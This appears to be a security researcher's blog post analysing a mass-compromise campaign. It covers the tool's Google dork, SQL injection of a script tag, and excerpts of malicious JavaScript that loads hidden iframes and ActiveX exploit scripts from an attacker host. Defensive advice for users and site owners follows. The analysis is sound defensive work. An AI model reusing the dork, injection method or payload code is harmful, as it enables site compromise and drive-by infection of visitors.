It seems Internet users do not have any peace anymore. We have witnessed a lot of security issues on
the Internet to date but never like this latest period, which can be named -to my personal perspective-
as “the age of compromised websites”.
The Anti-Malware research community is getting increasing daily reports relating to innocent websites
being compromised and “infected” by malicious scripts redirecting the victim users to malicious hosts which
serve and drop Malware.
This kind of attack is not new and we have been working to get the general idea of what they do during these
attacks but so far it has not very clear how they (hackers) operate.
We have received reports of dozens and dozens of compromised websites containing iframes (see http://en.wikipedia.org/wiki/IFrame for an explanation of iframes) redirecting users to many Chinese
malicious hosts.
What we are sure of is that malicious individuals are using automated tools to exploit the websites.
A common exploit strategy used is: 1) perform a scan using some search engines like Google, for example,
in order to find potentially vulnerable applications and then 2) exploit them. The exploit in this scenario consists of
an SQL statement that tries to inject a script tag into every HTML page on the vulnerable website. What eventually happens is the attacker finds a weakness in the website, posts their malicious code, thus “infecting” the website.
A tool currently under analysis and recently known to be the tool responsible for many “infected” websites
comes directly from Chinese underground and it looks like this:
As shown in the screenshot above, the tool scans a bunch of websites making use of Google search engine
looking for vulnerable websites containing, in this case, the query string inurl:".asp" inurl:"a=".
The tool is configurable so every vulnerable string can be set to launch the attack.
Another interesting part of the tool is the malicious javascript code used to insert and inject the vulnerable
websites making them compromised (see below):
As shown the formset in this case is configured to inject the string:
<script src=http://www<dot>2117966<dot>net/*uckjp.js></script>
Dissecting the malicious javascript file we find further interesting information:
…
{document.write ("<iframe width=-1 height=-1 src=\"2117966net/q.htm/">hxxp://www<dot>2117966<dot>net/q.htm\"></iframe>");}
else
{document.write ("<script src=http:\/\/www.2117966.net\/Xjp.js><\/script>");}
…
The code above means that main javascript code leads other malicious sections but still in the same host
(2117966.net).
Content of q.htm:
…
document.write("<script src=http://www.2117966.net/Ajax.gif><\/script>")
document.write("<iframe width='0' height='0' src='http://www<dot>2117966<dot>netMs06014.htm'></iframe>")}
else{
try{var r;var reals=new window["ActiveXObject"]("IERPCtl.IERPCtl.1");}
catch(r){};
finally{if(r!="[object Error]"){
document.write("<script src=http://www<dot>2117966<dot>net/Real.js><\/script>")}}
try{var g;var storm=new window["ActiveXObject"]("MPS.StormPlayer");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http://www<dot>2117966<dot>net/Bfyy.gif><\/script>")}}
try{var i;var thunder=new window["ActiveXObject"]("DPClient.Vod");}
catch(i){};
finally{if(i!="[object Error]"){
document.write("<script src=http://www<dot>2117966<dot>net/Ms07004.html><\/script>")}}
try{var j;var lianzhong=new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1");}
catch(j){};
finally{if(j!="[object Error]"){
document.write("<script src=http://www<dot>2117966<dot>net/ms06067.js><\/script>")}
if(r=="[object Error]"&&g=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){
document.write("<iframe width='0' height='0' src='http://www<dot>2117966<dot>net/QVod.html'></iframe>")}}
…
The various iframes shown in the code above lead to other malicious pages and malicious scripts which in turn
lead to other malicious scripts and malicious pages creating a real complex number of wrapped links dropping
-at the end of the chain- dangerous malware on the victim machines.
What can a user do?
It is not easy to understand if a website is “infected” or not. Many users report that they simply browsed a website
and then became “infected.” This scenario doesn’t make you feel very well protected especially if you take care in
where you browse. As a result of this type of attack, a website that would normally be considered innocent or
benign can stealthily become malicious. One day the site is safe then next it is dangerous. This is what makes
this type of attack so effective.
From the user side, a safe approach is to keep your anti-virus and anti-spyware software up to date. Additionally
one may consider setting Internet Explorer to prompt the user before following an iframe. (See instructions here: http://support.microsoft.com/kb/182569/en-us) Lastly one may consider the use of content filtering tools.
These tools are able to block malicious javascript and alarm the user before being redirected to another website. Remember it’s typically the website that you are redirected to that hosts the malware that is downloaded to
your computer.
What can a website owner do?
From the website owners point of view it is recommended that they scan their webpages looking for known
vulnerabilities. This step alone will eliminate the majority of exploit vectors. Of course there are potentially
unknown, or “zero-day” vulnerabilities, but closing the known vulnerabilities will greatly reduce the vulnerabilities
that are most commonly exploited via automated tools. Additionally website owners can consider the security
help-service provided search engines as described here.
Needless to say that it is strongly recommended to keep web servers up to date to the latest released patches;
this would hugely decrease the number of vulnerabilities.